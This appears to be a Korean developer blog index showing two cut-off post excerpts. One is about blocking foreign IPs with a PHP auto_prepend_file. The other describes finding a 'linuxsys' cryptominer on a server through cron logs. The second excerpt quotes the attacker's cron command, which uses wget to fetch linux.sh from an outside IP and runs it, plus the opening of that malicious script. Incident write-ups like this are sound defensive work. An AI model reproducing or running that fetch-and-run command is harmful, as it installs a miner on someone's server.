Dev

온갖 해외 ip로 서버 해킹을 하려 하고 온갖 사진들을 추출하고 트레픽이 이만 저만이 아니다. 어느정도 서버 관리 능력이 있으면 GEOIP를 사용하고 초보자들은 사용하기에 너무 복잡하니 아래와 같은 방법으로 진행한다. .htaccess 나 vhost 쪽에 설정해도 되나 귀찮으니 1. 서버 접속시 php 부터 호출하도록$ php --ini // php.ini파일 확인 후 아래 항목 추가한다.   auto_prepend_file = "/home/chkip/config.php" 2. config.php 작성헤더쪽 오류가 있을 경우 ob_start() ob_end_flush() 주석처리한다.//ob_start();//session_start(); $userIp = $_SERVER['REMOTE_ADDR']; $..

1. 증상 top 명령서 "linuxsys" 라는 놈이 cpu 600~700 차지하고 아파치 서버가 거의 죽을 정도로 동작 2. 채굴기 top 으로 보면 linuxsys 라는 놈 프로세스 아무리 찾아도 안보인다. 프로세스로 사용중인 포트와 ip를 찾아보니 http://141.94.96.195/ 이게 나온다. 접속해보면~ Mining Pool Online 내 서버로 채굴을 하고 있군... 2. 시스템로그 추적결과 클론쪽에서 저런 동작이 보인다. 클론에서 동작중인 내용을 보면 wget http://103.214.112.10/linux.sh 으로 받아오고 curl 로 실행을 시키고 있다. #!/bin/sh p=$(ps aux | grep -E 'linuxsys|jailshell' | grep -v grep |..